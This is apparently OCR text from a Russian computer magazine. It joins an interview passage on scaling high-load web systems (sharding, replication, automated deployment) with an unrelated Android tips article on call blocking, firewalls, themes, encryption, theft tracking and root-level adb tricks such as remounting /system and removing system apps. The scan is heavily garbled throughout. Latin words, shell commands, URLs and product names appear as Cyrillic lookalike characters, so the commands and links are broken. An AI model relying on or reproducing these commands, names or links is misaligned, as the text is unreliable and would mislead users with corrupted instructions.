В классической схеме каждое из звеньев ра- 
ботает на своем сервере. Обычно для проекта 
используется как минимум два. Первый — это 
сервер, на котором работает пдіпх или любой 
другой фронтенд (первое, куда приходит поль- 
зователь). Вторая часть — это более мощный 
сервак, где происходят вычисления и где 
лежит база данных. Иногда отдельно выносят 
и базу данных. Если все разнесено на три ма- 
шины (фронтенд, бекенд и база данных), этого 
реально хватит для очень многого. 



А вот дальше уже начинаются сложности. 

Проект растет, и спустя какое-то время вы, 
вероятно, начнете замечать, что какая-то часть 
системы проседает, с ней что-то не так. Она на- 
чинает работать медленно. Чаще всего это база 
данных. Дальше начинается масштабирование 
базы данных. Что это означает? То есть вам 
нужно каким-то образом разделить нагрузку. 
Сделать так, чтобы база данных была в не- 
скольких экземплярах или хранилась на двух- 
трех серверах. Здесь встает вопрос подбора 
конкретного инструмента. Инструментов много. 



МАСШТАБИРОВАНИЕ БАЗЫ ДАННЫХ) 



Вы можете применить репликацию. Что это 

такое? Вы ставите второй сервер с базой дан- 
ных, связываете их определенным образом, 
и второй сервер через некоторое время просто 
копирует структуру и все данные первого. 
Соответственно, запросы на чтение с этого 
момента идут к двум базам данных сразу. 

Другой инструмент — партиционирование. 
Что это означает? Например, все таблицы, свя- 
занные с форумом, лежат в одной базе данных 
(на одном сервере). А все таблицы, связанные 
с новостями, лежат в другой базе данных. 
Соответственно, в слое хранения данных не- 
обходимо отразить такое разделение. Теперь, 
когда к этому слою приходит запрос «достань 
объект», — он смотрит, откуда этот объект: из 
форума или из новостей. Если из форума, он 
«идет налево», если из новостей — «направо». 

Партиционирование — один из самых 
простых способов распределения нагрузки. 
Таким образом можно довольно долго дробить 
базу данных и довольно долго так жить. Одна- 
ко рано или поздно вы упретесь в проблему: 
одна сущность (например, новости) на один 
сервер не влезает. 

Шардинг — еще один из самых простых 
способов масштабирования баз данных. 

Заключается он в следующем: какую-то одну 
сущность, какие-то однотипные данные 
делите на разные машины. Например, берете 
новости и по какому-то принципу разделяете 
их на несколько серверов, раскладываете 
(шардируете) на несколько отдельных баз 
данных. Весь вопрос здесь в принципе, по 
которому происходит разбиение (по какому 
ключу или логике). 

С принципом шардирования важно не 
ошибиться. Необходимо убедиться в том, что 
он будет работать и сейчас, и когда у вас будет 
пользователей в сто раз больше. Обычно делят 
по какому-то уникальному ключу. Приведу 



пример. У вас есть сто миллионов пользо- 
вателей: в одну базу данных они не влезают 
или влезают, но жутко тормозят. Вам нужно 
их разложить. Вы решаете разложить их по 
миллиону, но как делить? По логину или по 
идентификатору? Допустим, берете и дели- 
те идентификатор на сто, а за номер шарда 
(сервера), где будет храниться пользователь, 
берем остаток от деления. 

С шардированием есть также немало 
всяких хитростей. Вы все разделили и рас- 
пилили, и у вас все работает. Хорошо. Но потом 
ваш распил может перестать работать, потому 
что пользователей опять стало в десять раз 
больше. Получается, их нужно делить опять, 
а это уже не так просто. Система-то работа- 
ет, пользователи живы: они где-то на сайтах 
регистрируются, сообщения постят, а вам 
нужно скопировать данные из одного места 
в другое, сделать это «на лету» и желательно 
без остановки сервиса. Воттут-то и начинает- 
ся свистопляска. Есть много способов, которые 
позволяют облегчить ее в будущем или вообще 
предотвратить. Один из методов — виртуаль- 
ный шардинг. Другой способ — применение 
некоего центрального диспетчера, который 
знает, где какой пользователь лежит и что 
с ним происходит. Также можно воспользо- 
ваться просто грамотным разделением на 
шарды, которое в будущем не потребует по- 
добных переездов. 



ПРО ЖОНГЛИРОВАНИЕ 



Есть горизонтальное и вертикальное масшта- 
бирование. В первом случае производитель- 
ность возрастаетза счет дополнительных 
серверов, о чем мы уже поговорили, а во вто- 
ром — за счетувеличения мощности сервера. 

Вертикальное масштабирование — не 
очень красивый способ, его не особенно 
любят. Немного нахрапом получается: взяли 
и решили вопрос деньгами. Но в высоких 
нагрузках нужно выбирать самый простой 
способ решения проблемы, который применим 
прямо здесь и сейчас. Когда этот способ пере- 
станет работать — примените другой. Нужно 
учитывать всё в комплексе. Если заниматься 
шардированием этих новостей на несколько 
машин — это оченьдорого. Атак вы потратили 
месячную зарплату программиста и купили 
более мощный сервер или добавили еще денег 
и приобрели какую-то совсем крутую железку. 
С этим нужно «играть». 

Никакого универсального рецепта нет. 
Есть лишь набор инструментов, которые мож- 
но применять. Инструментами можно и нужно 
«жонглировать» — для этой части системы 
у вас один инструмент, для другой части — 
другой. Это нормально. Возьмем те же Ваби, 
«Яндекс» или «Рамблер». Там внутри столько 
всего: миллион разных демонов, обработчи- 
ков, баз данных. Это такое большое-большое 
лоскутное одеяло. Тем не менее это работает, 
потому что для каждой задачи используется 
подходящий инструмент и оптимальный спо- 
соб решения проблемы. 



ВЫ НЕ ЗНАЕТЕ, КАК ВЫСОКОНАГРУЖЕННЫЙ 
ПРОЕКТ СЕБЯ ПОВЕДЕТ. У НЕГО ЕСТЬ ТОЛЬ- 
КО ОДНО ГАРАНТИРОВАННОЕ СВОЙСТВО — 

В НЕМ ВСЕГДА ЧТО-ТО ЛОМАЕТСЯ 
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Интервью с разработчиком ЬідЫоасІ-систем 




О НЕШТАТНЫХ СИТУАЦИЯХ 
И РАЗВЕРТЫВАНИИ 



Чем в большинстве случаев отличается 
высоконагруженный проект от простого? 

В большинстве случаев вы не знаете, как вы- 
соконагруженный проект себя поведет. У него 
есть только одно гарантированное свойство — 
в нем всегда что-то ломается. Он большой, там 
много серверов и много составляющих частей. 
А раз там что-то ломается, вы должны быть 
к этому готовы. Тогда ситуация из нештатной 
превращается в штатную. Нужно быть заранее 
готовым к тому, что диск сгорит, сервер выйдет 
из строя или что-то выкатили в бой, а оно не 
заработало. Все эти моменты должны быть 
продуманы заранее. 

В большой системе много блоков, и они 
все должны быть сдублированы, и все должно 
работать железно. Независимо оттого, что где- 
то что-то сгорело, что-то не работает, какой-то 
канал пропал и так далее. Поэтому одна из 
составляющих — это деплой. 

У Атаіоп есть такой способ тестирования, 
называется СКіаоз Мопкеу. Его суть легко объ- 
яснить на примере. Допустим, есть огромная 
система на тысячу серверов. Каждый сервер 
что-то отдельно делает, на каждом сервере 
работает десять процессов. Берется скрипт 
СЬаоз Мопкеу и запускается в систему, тот 
прыгает с машины на машину и хаотично 
прибивает процессы в памяти. Просто берет 
и киляет. Короче говоря, всеми силами создает 
внештатную ситуацию. Но при этом грамотная 
система должна работать и для пользователей 
ничего не должно происходить. Потрясающий 
принцип тестирования: его фиг применишь, но 
вообще надо бы. 

Если разработчик правит код на боевом 
сервере, это ужасно. Предположим, у вас сто 
серверов. Как вы представляете себе правку 
кода в бою? Это просто невозможно. Должен 
быть скрипт, некая система, где вы нажимаете 
на кнопочку и она сама идет на все эти сто 
серверов, сама достает свежий код из опреде- 
ленной ветки 5ѴЫ или Ігипк'а, сама выклады- 
вает код в нужное место, делает бэкап старого 
кода, сама стартует заново все, что нужно. Это 
должна быть полностью автоматическая про- 
цедура. И это нужно делать часто: чем чаще вы 
деплоитесь, тем лучше. Мы сейчас консуль- 
тируем одну молодую сеть: они деплоятся раз 
в неделю. Мы им говорим: «Ребят, это очень 
редко! Нужно деплоиться каждый час, ну хотя 
бы несколько раз в сутки». Это должна быть 
очень простая процедура: запустили — выка- 
тилось, запустили — выкатилось. Это должно 
быть автоматизировано. И точно так же нужно 
подумать про откаты назад. 

О мониторинге и развертывании, то есть 
выкладке кода на боевой сервер, нужно 
думать с самого начала. К примеру, у вас есть 
отдельный тестовый сервер, где вы все тести- 
руете и разрабатываете, есть репозиторий — 
и есть процедура, которая позволяет нажатием 
одной кнопки или набором одной команды 
разложить код на всех боевых серверах. 

Если вы выбираете облачный хостинг, 
знайте, что он потребует от вас умения раз- 



вертываться с абсолютно нового сервера за 
20 минут. Скрипты, которые все разворачива- 
ют, должны быть отточены до такого уровня, 
что... Сегодня и сейчас все работает, а через 
час уже не работает, и вас перебросили на дру- 
гой сервер, в другой дата-центр. И вы должны 
подняться и продолжить работать. Наличие 
облачного сервиса не снимает с разработчиков 
ответственности за то, чтобы сделать хорошее 
масштабируемое решение. 

Облако хорошо подходит для среднего 
размера проектов. Для маленьких проек- 
тов это слишком круто (лучше хоститься на 
обычном хостинге), а для больших слишком 
непонятно, что происходит «за кулисами». 

Отдельная проблема выкатки с базами 
данных. Редкие разработчики приучаются 
работать с базой данных так же, как с кодом. 
Но, по сути, схема базы данных — это тоже ку- 
сок кода. Когда вы пишете код, вы кладете все 
в 5ѴЫ — от начала и до конца. То же самое вы 
должны делать и с базой данных. Недопустима 
ситуация, когда программист входит в базу 
и делаеттам «аІІегІаЫе», никому об этом не 
говоря. Нет! Он должен написать 501_-запрос 
«аііег ІаЫе» и закоммитить его в некий 5ѴІМ, 
желательно сразу вместе со скриптом, кото- 
рый будет откатывать это изменение. И уже 
потом можно делать деплой, чтобы схема 
баз данных на боевых серверах поменялась. 

У вас в каждом проекте должен быть набор 
50І_-скриптов, который вы запускаете, чтобы 
полностью воссоздать свою базу данных. 

Все описанное выше нужно для пред- 
сказуемости. Вы должны иметь возможность 
за какое-то небольшое время полностью 
воссоздать свою систему с нуля. Как вы будете 
ее воссоздавать, если часть базы данных 
у вас делается из скриптов, другая — из 
5(ЭІ_-запросов, а другая часть — это умный 
разработчик зашел и через «аііег ІаЫе» какой- 



то индекс прописал? Любое изменение надо 
зафиксировать в 5ѴІМ, чтобы потом это было 
воспроизводимо. 

Высоконагруженный проект подразумева- 
ет определенную строгость в работе с кодом, 

в работе с базой данных. Я бы даже сказал — 
аскетичность. 

Вы должны мониторить все. Крупная 
система требует внимательного отношения 
к себе. Это не автоматическая поделка — 
каждый раз это ремесленный ручной труд. 

Есть куча средств мониторинга и наблюдения. 
Вы можете даже вычислять, какая страница 
насколько тормозит, или вычислить, сколько 
времени требует на исполнение какой-либо 
блок на какой странице. Проблему можно 
знать даже настолько глубоко. 



О КОНКРЕТНЫХ ИНСТРУМЕНТАХ 



Мы сами используем много всего. Используем 
Му5(ЭІ_ и Ро5Ідге5СІІ_ в качестве основных баз 
данных и МопдойВ, которую научились хорошо 
вартить, — в качестве быстрой. В качестве 
сотеі-серверов используем ЫосІеЭЗ. 

Простое правило: разрабатывать нужно на 
том, что лучше всего знает команда разработ- 
чиков. Те же очереди, для которых сейчас ис- 
пользуют РаЬЬііМСі и не только, легко и просто 
реализуются на Му5(ЭІ_. Если вы лучше знаете 
Му5(ЭІ_ и никогда не работали с РаЬЬііМСі, пи- 
шите очереди на Му5(ЗІ_. Лучше использовать 
тот инструмент, который знаешь. 

И напоследок повторюсь — высокона- 
груженный проект очень сложно написать 
с нуля, да и в большинстве случаев не нужно. 
Но можно максимально упростить себе жизнь, 
заранее заложив на будущее возможность для 
маневра и масштабирования. При этом нет ни- 
какого универсального решения и серебряной 
пули — есть набор инструментов и технологий, 
которые надо применять. ПС 
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ТІРЗ'Ы'ТМСКЗ ИЗ АРСЕНАЛА АНДРОИДОВОДА 



Всего за несколько лет АпсІгоісІ превратился из игрушки боодіе в одну из самых популярных мобильных 
ОС. Теперь он многофункционален, имеет репозиторий с десятками тысяч приложений, снабжен 
множеством скрытых настроек. Разобраться во всем этом с наскоку непросто, поэтому я подобрал два 
десятка советов по использованию зеленого робота, которые сделают работу с устройством проще, 
позволят защитить смартфон, сэкономить твои деньги и нервы. 



ВСЕГО ЛИШЫЕЛЕФОН... 



Кто бы что ни говорил, но любой смартфон 
под управлением АпсІгоісІ — это прежде всего 
телефон, а лишь затем карманный компьютер, 
коммуникатор и игровая приставка. Поэтому 
в первом разделе своего обзора я хотел бы по- 
говорить о телефонных возможностях АпсІгоісІ, 
а именно о функциях, предназначенных для 
совершения звонков, отправки СМС, и других 
вещах, которые вскоре уйдут в небытие и усту- 
пят место ЗаЬЬег и 5ІР-телефонии. Итак, что же 
может предложить здесь АпсІгоісІ? 



Блокиратор звонков. В Маркете есть 
огромное количество блокираторов звонков 
и СМС, большинство из них либо вообще не 
работает, либо работает по принципу «сбро- 
сим на первой секунде». Между тем есть один 
очень интересный трюк, который позволяет 
получить качественный блокиратор вообще 
без использования сторонних приложений. За- 
ключается он в том, чтобы задать в настройках 
телефона (это приложение, а не девайс) левый 
номер голосовой почты (Телефон -> Настройки 
-> Настройки голосовой почты), а затем в на- 



стройках нужного (точнее, ненужного) контак- 
та указать «Только голосовая почта». В этом 
случае все звонки человека будут перенаправ- 
ляться на этот номер и отшибаться, если он 
недействительный (например, 123). 

Дешевые СМС. Мы привыкли использо- 
вать ЗаЬЬег, боодіе Таік и почту для общения 
с людьми со своего смартфона, у многих из нас 
подключен недорогой безлимитный мобиль- 
ный интернет, у нас на смартфонах установ- 
лены клиенты для всевозможных социальных 
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Управлять потребностями приложений в интернете с помощью йгоісІѴѴаІІ легко 
и просто 



сетей и форумов, на которых мы общаемся 
и обмениваемся информацией. Однако очень 
большое количество людей продолжает поль- 
зоваться обычными телефонами и отправляет 
нам обычные СМС-сообщения, отправка ответа 
на которые будет стоить нам денег, а наш без- 
лимитный интернет останется не у дел. Решить 
эту проблему можно с помощью СМС-гейта, 
позволяющего пересылать СМС, используя 
интернет-соединение. Для одного из таких 
СМС-гейтов под названием ЗахІгбМб в Мар- 
кете можно найти специальное приложение 
( доо.дІ/38оКѵ ). установив которое ты сможешь 
отправлять сообщения по очень низкой цене — 
в несколько раз ниже цены оператора. 

Быстрый набор номера. В АпсІгоісІ есть 
удобный способ набора номера любого абонен- 
та из адресной книги всего одним касанием 
пальца. Для этого достаточно просто раз- 
местить на рабочем столе ярлык «Быстрый 
звонок» и выбрать необходимого абонента из 
списка. Если отвести для размещения этих 
ярлыков отдельный рабочий стол, то можно 



получить очень удобную и быструю звонилку, 
которая будет всегда под рукой. 



ИНТЕРНЕТ 



Наверное, вторая по важности функция со- 
временного смартфона — это постоянный до- 
ступ к Сети, чтобы всегда оставаться на связи 
(в том числе в социальных сетях и сервисах 
мгновенного обмена сообщениями), да и про- 
сто иметь интернет под рукой. К сожалению, 
с доступом к Всемирной паутине в АпсІгоісІ не 
все так хорошо, как хотелось бы. Связь с ЗС 
часто прерывается, встроенного брандмауэра 
нет. Посмотрим, можно ли это исправить. 

Принудительное включение 36. Радиомо- 
дули некоторых смартфонов слишком чувстви- 
тельны куровню 36-сигнала и при малейшем 
его падении переключаются на 26-сеть, а об- 
ратно возвращаются очень неохотно. К сча- 
стью, в настройках АпсІгоісІ можно изменить 
такое поведение и принудительно заставить 
смартфон сидеть на 36 даже в условиях очень 
плохой связи. Только вот настройки эти не 



совсем обычные и открываются лишь после 
ввода сервисного кода с помощью номерона- 
бирателя. Чтобы попасть в них, необходимо на- 
брать *#*#4636#*#*, выбрать пункт меню «Ин- 
формация о телефоне», а затем отмотать экран 
до пункта «Настроить предпочтительный тип 
сети» и выбрать «ѴѴСйМА опіу». Кстати, здесь 
же можно узнать массу информации о текущем 
подключении к сети, номер ІМЕІ, номер теле- 
фона и так далее. 

Брандмауэр. По умолчанию в комплекте 
АпсІгоісІ нет встроенного файера, поэтому, если 
интернет не безлимитный, деньги с баланса 
утекают довольно-таки быстро. Интернет 
используют не только такие приложения, как 
бтаіі или боодіе Таік, но и многие игры, чтобы 
показать рекламу. Приложения прибегают к 
интернету для отправки статистики исполь- 
зования, проверки обновлений, навязывания 
пользователю других софтин и так далее. 
Чтобы отучить их делать это, можно восполь- 
зоваться стандартным ірІаЫез либо устано- 
вить брандмауэр с графическим интерфейсом 
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Темы МЛоскег действительно отличаются друг от друга 



йгоісІѴѴаІІ ( доо.д!/г8г85 ). Приложение не позво- 
ляет открывать те или иные порты или каким- 
то образом управлять трафиком, но оно может 
полностью запретить использование сети для 
выбранных софтин, причем отдельно как для 
ЗС-канала, так и для ѴѴі-Рі. Просто запусти 
йгоісІѴѴаІІ и отметь галочками те приложения, 
которые должны получить доступ в интернет. 



ВНЕШНИЙ ОБЛИК 



Вкусы и образ жизни людей могут сильно от- 
личаться, и внешний вид интерфейса должен 
им соответствовать. По умолчанию АпбгоісІ 
позволяет изменять свой облик только на 
уровне домашнего экрана, который можно за- 
менить на что-то более удобное и подходящее 
к использованию, однако с помощью нехитрых 
трюков можно пойти гораздо дальше этого 
ограничения. 

Темы. В таких прошивках, как СуаподепМоб 
и МІІІІ, есть встроенный движоктем, раз- 
работанный компанией Т-МоЫІе и выложен- 
ный в открытый доступ. Установить темы на 
девайсы с этими прошивками очень легко: 
в СуаподепМоб просто найди нужную тему 
в Маркете и установи (поиск по запросу «ст7 
іЬете»), в МІІІІ есть встроенное приложение 
для поиска и установки тем. Если же ты по 
каким-то причинам не можешь установить одну 
из этих прошивок, то изменить внешний облик 
робота можно с помощью утилиты МеІаМогрЬ 
( доо.д І/ѵѵООзР . а также одной из тем, скачанных 
отсюда: доо.дІ/сгТС . Просто положи нужную 




тему на карту памяти и распакуй ее в систему 
с помощью МеІаМогрЬ (приложение требует 
рутинга и установки ЬизуЬох из Маркета). 

Идеальный домашний экран. Не суще- 
ствует замены лаунчера Апбгоіб, которая бы 
подошла всем; кто-то хочет видеть на экране 
только иконки приложений, кто-то — важ- 
ную информацию вроде календаря и спи- 
ска пропущенных вызовов, третьи — и то 
и другое плюс кнопку вызова меню в правом 
верхнем углу. Зато существует модульный 
Зѵѵееіег Ноте, который позволяет создать 
свой собственный неповторимый домашний 
экран, составив его из набора различных 
модулей вроде кнопок, иконок, изображений 
различных элементов интерфейса (списка 
приложений, списка контактов и так далее). 

К сожалению, проект до сих пор носит экс- 
периментальный характер, поэтому скачать 
приложение можно только с официального 
веб-сайта: ѵѵѵѵѵѵ.зѵѵееіегЬоте.сот . 

Экран блокировки. Стандартный экран 
блокировки не просто со временем приедается 
взгляду, он еще и малоинформативен. Все, 
что ты можешь на нем увидеть, — это текущее 
время, а также строка состояния, для доступа 
к которой придется разблокировать устрой- 
ство. Чтобы получить больше информации без 
необходимости разблокировать смартфон, 
используй сторонние экраны блокировки. 
Одним из лучших локскринов с поддержкой 
огромного количества тем снабжена прошив- 




ка МІШ, но даже если ты не собираешься ее 
устанавливать, ты всегда сможешь установить 
ее экран блокировки в качестве стороннего 
приложения под названием МИоскег ( доо.ді/ 
Хпкот ). Также рекомендую обратить внимание 
на ѴѴібдеНоскег ( доо.д І/В к] Р N 1. который по- 
зволяет не только менять темы, но и вешать на 
локскрин иконки приложений, ярлыки и, самое 
главное, виджеты, отображающие полезную 
информацию. Однако за его использование 
придется отдать 89 рублей. 

Строка состояния. В отличие от домашнего 
экрана, строка состояния в Апбгоіб не может 
быть изменена стандартными средствами. 
Фактически это системный компонент, кото- 
рый намертво вшит в графический интерфейс 
самой ОС. По этой причине возможности его 
кастомизации сильно ограничены — только 
установка сторонних прошивок и модифика- 
ция графической библиотеки. В то же время 
статусбар можно вполне легально заменить 
или дополнить возможностями. Первое можно 
осуществить с помощью сторонних приложе- 
ний, таких как 5ирег Зіаіиз Ваг ( доо.дІ/прРЦк ). 
однако из-за принципа работы, основанного на 
перекрытии стандартной строки состояния, он 
имеет множество глюков, с которыми трудно 
мириться. Если же тебе необходимо всего лишь 
добавить дополнительную информацию в ста- 
тусбар, то ты можешь воспользоваться прило- 
жением СооІ ТооІ ( доо.дІ/РбРР ). Оно позволяет 
разместить в строке состояния информацию 
о текущей загруженности системы, включая 
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Секреты зеленого робота 



процессор, память, сетевой трафик и так 
далее. Также рекомендую обратить внимание 
на Місго СРІІ Мопііог ( доо.дІ/хІХох ) и Т.Е.А.М. 
Ваиегу Ваг ( доо.дІ/8І_РРЗ ), которые выводят 
текущую нагрузку на процессор и текущий 
уровень заряда батареи в виде тонкой полосы 
в один пиксель сразу под статусбаром. 

Шрифт. Для вывода текста на экран АпсІгоісІ 
использует стандартную библиотеку ітееіуре, 
также используемую оконной системой X 
ѴѴіпбоѵѵ. Это значит, что он может выводить 
на экран не только стандартный шрифт (РгоісІ 
в версиях до 2.3 и РоЬоІо в 4.0), но и любой 
другой в формате ТТР (а также других). Чтобы 
установить сторонний шрифт в систему, вос- 
пользуйся приложением Ропі ІпзіаІІег [ доо.ді/ 
ѴѴРУаг ). 



БЕЗОПАСНОСТЬ 



Смартфоны хранят массу важной инфор- 
мации о нас самих, наших друзьях и знако- 
мых, счетах, паролях от веб-сайтов, номера 
интернет-кошельков, непристойные фото- 
графии и многое-многое другое. Фактически 
в современном мире смартфон — это и есть ты, 
и защищать информацию, хранимую в смарт- 
фоне, необходимо еще более тщательно, чем 
содержимое жестких дисков. По умолчанию 
в АпсІгоісІ есть некоторые средства защиты, 
вроде графического ключа или снимка лица 
(в АпсІгоісІ 4.0), но это всего лишь игрушки, на 
которые нельзя полагаться всерьез. 

Шифрование. Один из главных недостатков 
АпсІгоісІ — это отсутствие встроенного меха- 
низма шифрования 50-карты. Любой завла- 
девший смартфоном злоумышленник сможет 
извлечь карту памяти и прочитать все, что 
на ней хранится, включая бэкапы прошивки, 




Экран Ргеу сразу после запуска 



данные приложений и фотографии. Избе- 
жать такой ситуации можно, создав на карте 
защищенный контейнер, куда ты сможешь 
поместить всю личную информацию. Сделать 
это с помощью стандартных средств І_іпих не 
получится: в АпсІгоісІ просто нет необходимых 
инструментов, зато сторонние приложения 
справятся с задачей без проблем. Хороший 
пример таких приложений — это Рііе І_оскег 
[ доо.дІ/ідоЗе І и ОгоісІ Сгурі [ доо.дІ/КтІ ІР ). Пер- 
вый позволяет шифровать файлы по отдельно- 
сти, второй создает контейнер, зашифрован- 
ный с помощью АЕ5 (обойдется в 77 рублей). 
Также рекомендую посмотреть в сторону Нісіе 
іі Рго, с помощью которого удобно скрывать 
фотографии и видеозаписи ( доо.дІ/15Р29 ). 

Ограничение приложений в полномочи- 
ях. Любое АпсІгоісІ -приложение имеет ряд 
полномочий, которые можно просмотреть во 
время установки пакета. Сделать что-либо 
сверх этих полномочий приложение не сможет, 
однако некоторые программы злоупотребляют 
своими возможностями, используя их не по 
назначению (например, используют доступ 
к интернет-соединению не только для провер- 
ки обновлений, но и для отправки твоей кон- 
фиденциальной информации). Чтобы этого не 
происходило, приложение можно ограничить 
в полномочиях с помощью встроенных средств 
СуаподепМоб/МІШ либо установив приложение 
Регтівзіопз йепіесі ( доо.дІ/кс1_УА ). Достаточно 
выбрать в списке нужное приложение и ука- 
зать права, которые оно будет иметь. 

Поиск украденного телефона. Смартфоны 
крадут и теряют намного чаще любой другой 
техники, при этом вернуть пропавший девайс 
в большинстве случаев не представляется 
возможным. По запросу отдела «К» оператор 
может определить примерное положение теле- 
фона по его ІМЕІ, но дальше наша доблест- 
ная полиция обычно работать отказывается 
и вскоре закрывает дело. Поэтому остается 
надеяться только на самих себя, а также спе- 
циализированные сервисы поиска украденной 
техники. Один из таких сервисов называется 
Ргеу. Чтобы активировать возможность поиска 
смартфона с его помощью, установи на девайс 
одноименное приложение ( доо.дІ/05пох ). за- 
пусти его и, в ответ на предложение создать 
аккаунт, введи свой ник, е-таіі и пароль. На 
почту придет сообщение со ссылкой на актива- 
цию аккаунта, после чего в приложении можно 
будет ввести пароль и оно повиснет в фоне. 
Чтобы начать отслеживать устройство, войди 
на сайт ргеурго]ес1.сот и включи в настройках 
устройства опцию «Міззіпд?» (или отправь 
на телефон СМС с текстом «СО РНЕѴ»). После 
этого каждые двадцать минут смартфон будет 
отправлять на сайт информацию о своем ме- 
стоположении, а также отчитываться о смене 
5ІМ-карты. 



ХАРД КОР 



Последний раздел статьи я хотел бы посвятить 
интересным и более продвинутым трюкам, 
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Очищать ОЗУ 



Заставляем смартфон висеть на 36 постоянно 

которые не вписываются ни в одну из вышепе- 
речисленных тематик. Здесь я расскажу о том, 
как можно заменить или удалить системные 
приложения, как заставить систему устанав- 
ливать любые приложения на 50-карту, как 
обмануть игры, привязанные к конкретным 
аппаратным платформам. 

Удаление и замена системных приложе- 
ний. Обычно заводская прошивка смарт- 
фона включает в себя множество мусорных 
софтин, предустановленных компанией- 
производителем или оператором (привет 
МТС). Удалить эти приложения как бы не- 
возможно, поскольку они включены в саму 
прошивку, но, вооружившись инструментом 
абЬ, ты легко сможешь избавиться от них или 
заменить на другие, более подходящие тебе 
альтернативы. Для примера приведу способ 
удаления мусора под названием «Моіогоіа 
Рбопе Рогіаі» со смартфонов одноименной 
фирмы. Сначала необходимо получить права 
гооі на смартфоне, об этом было подробно 
написано в статье «Тотальное подчинение» 
(октябрьский номер Хакера за 2011 год). 

Далее включаем режим отладки (Настройки 
-> Для разработчиков -> Отладка АпсІгоісІ). На- 
конец, скачиваем асІЬ: 

$ м§е1: бТТр://Лое.Ьи1:1:егЬго1:.ог§/ 
ехТегпа1/асІЬ.§2 
$ §ип 2 Ір асІЬ.^і 
$ сбтосі +х асІЬ 
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С0ѴЕР5Т0КѴ 



Запускаем его с правами гооі и монтируем 
системный раздел в режиме чтения-записи: 

$ зисіо асІЬ зИеІІ 
асІЬ$ зи 

асІЬ# тоипі: -о гетоипТ., гм /зузТет 

Теперь можно удалить любое системное 
приложение (все они находятся в каталоге/ 
зузіет/арр): 

асІЬ# гт /БузТет/арр/МоТоРІіопеРогІіаІ . арк 

Таким же образом можно сделать любое 
установленное из Маркета приложение си- 
стемным (например, описанный в предыдущем 
разделе Ргеу): 

асІЬ# ср /сІа1=а/арр/сот.ргеу-1.ар к \ 
/зузТет/арр/сот. ргеу. арк 

Установка приложений на Бй-карту. 

Ещедо появления в АпбгоісІ официального 
механизма установки приложений на 50-карту 
энтузиасты придумали более прямой и универ- 
сальный способ сделать это. Заключается он 
в том, чтобы создать на карте памяти отдель- 
ный ехіЗ-раздел и просто смонтировать его 
к каталогу /баіа/арр поверх оригинального 
каталога с приложениями. Но есть способ еще 
проще: создать на 50-карте раздел арр и сде- 
лать /сіаіа/арр ссылкой на него: 

$ зисіо асІЬ зЬеІІ 
асІЬ$ зи 

асІЬ# тоипі: -о гетоипТ.пл/ /сіаііа 
асІЬ# тѵ /сІаТа/арр /зсісагсі 
асІЬ# 1п -з /зсісагсі/арр ісІаТа/арр 

Обман игр. Многие разработчики имеют 
договоренность с производителями смарт- 
фонов об эксклюзивном выпуске игр только 
для определенных аппаратных платформ. 
Особенно этим славятся компании 5опу 
и ЕА, благодаря которым многие игры могут 
работать только на Хрегіа РІ_АѴ или смартфо- 



нах аналогичной аппаратной конфигурации 
(Оиаісотт М5М8255). Поэтому даже если 
скопировать игру и попытаться запустить ее на 
другом смартфоне, получишь либо ужасные ар- 
тефакты графики, либо отказ запуска. Решить 
эту проблему можно с помощью приложения 
СЬаіпПгеЗсІ, которое подменит оригинальную 
0репС1_-библиотеку и заставит Зй-приложения 
думать, что они работают на смартфоне с со- 
вершенно иной аппаратной конфигурацией 
(разумеется, для этого нужен гооі). 

Установка приложения нетривиаль- 
на, поэтому опишу подробнее. Для начала 
устанавливаем через Маркет приложение 
«[гооі] СЬаіпЛгеЗО». Запускаем, на экране 
появится интерфейс приложения, жмем пункт 
«ІпзІаІІ», чтобы установить ОрепСЬ-библиотеку 
и перезагрузить устройство. После окончания 
загрузки вновь запускаем приложение, теперь 
его интерфейс должен стать богаче, появи- 
лись пункты «ІМідЫМосІе», «йе^аиі* ОрепСЬ 
зеШпдз» и «ІпзІаІІ рІидіпз/зЬасіегз». Перед 
тем как начать настройку, скачиваем архив 
с плагинами ( доо.дІ/1 зН Р2 ) и распаковываем 
его на 50-карту. Возвращаемся в приложе- 
ние, жмем «ІпзІаІІ рІидіпз/зЬасіегз» и дожи- 
даемся, пока приложение найдет плагины 
на карте памяти. Далее выбираем плагин: 
ІіЬ6І_ЕМІІ_І\ІѴЮІА, ІіЬСІ_ЕМІІ_СШАІ_СОММ или 
ІіЬ6І_ЕМІІ_Р0ѴѴЕРѴР. Здесь все должно быть 
ясно из названий: первый плагин эмулирует 
платформу ІМѴЮІА Тедга, второй — Оиаісотт 
с процессором Зпарсігадоп (как раз Хрегіа 
РІ_АѴ), третий — смартфоны на РоѵѵегѴР 
(Затзипд баіаху 5), фактически бесполезный. 
Все, можно запускать игры. 



ВЫВОДЫ 



Трудно представить себе более дружелюбную 
ктрюкам и хакам мобильную ОС, чем АпсІгоісІ. 
Получив права, ты сможешь делать с ОС все, 
что заблагорассудится, включая разнообраз- 
ные модификации интерфейса, задейство- 
вание возможностей ядра Ыпих, изменение 
компонентов ОС и даже установку Ыпих- 
дистрибутива. И-И 



ПОЛЕЗНЫЕ 
КЛАВИАТУРНЫЕ 
КОМБИНАЦИИ 
(ДЛЯ СМАРТФОНОВ 
С КЛАВИАТУРОЙ) 

• Поиск + В — браузер 

• Поиск + С — контакты 

• Поиск + 6 — бтаіі 

• Поиск + I — календарь 

• Поиск + М — боодіе Марз 

• Поиск+ Р — проигрыватель 

• Поиск + 5 — СМС/ММС 

• Поиск + У — УоиТиЬе 

• АН + пробел — вставить специальный символ 

• АН + йеі — удалить строку 

• АН + трекбол — управление положением 
курсора 

• Мепи + Х/С/Ѵ — вырезка/копирование/вставка 

• Мепи + А — выбрать весь текст 



ГОЛОСОВЫЕ КОМАНДЫ, 
ПРИНИМАЕМЫЕ АИРКОЮ 



• Карта [улица|дом|организация] 

• Маршруты до [улица|дом|организация] 

• Перейти на [ІІРІ_] 

• Отправить СМС [имя контакта] 

• Отправить электронное сообщение [кому] 
<сообщение> <текст сообщения> 

• Заметка для себя [текст заметки] 

• Установить будильник на [время] 

• Слушать [песня|исполнитель|альбом] — 
открыть композицию в УоиТиЬе 



СЕРВИСНЫЕ КОДЫ 
АМРОЮ 



* .ііі эо| 14:58 

Настройки голосовой почты 



|ѴѴАРНШ6!| 



Номер голосовой почты 



-не задано* 



Не пользуйся 
«убийцами задач» 
для экономии 
батареи. Фоновые 
приложения 
не создают нагрузку 
на процессор, 
а потому не садят 
батарею. Они просто 
тихо спят в памяти, 
но, если ты будешь 
постоянно убивать 
их, на повторный 
запуск приложений 
будут тратиться 
процессорные 
ресурсы, что 
приведет 
к дополнительным 
расходам энергии. 



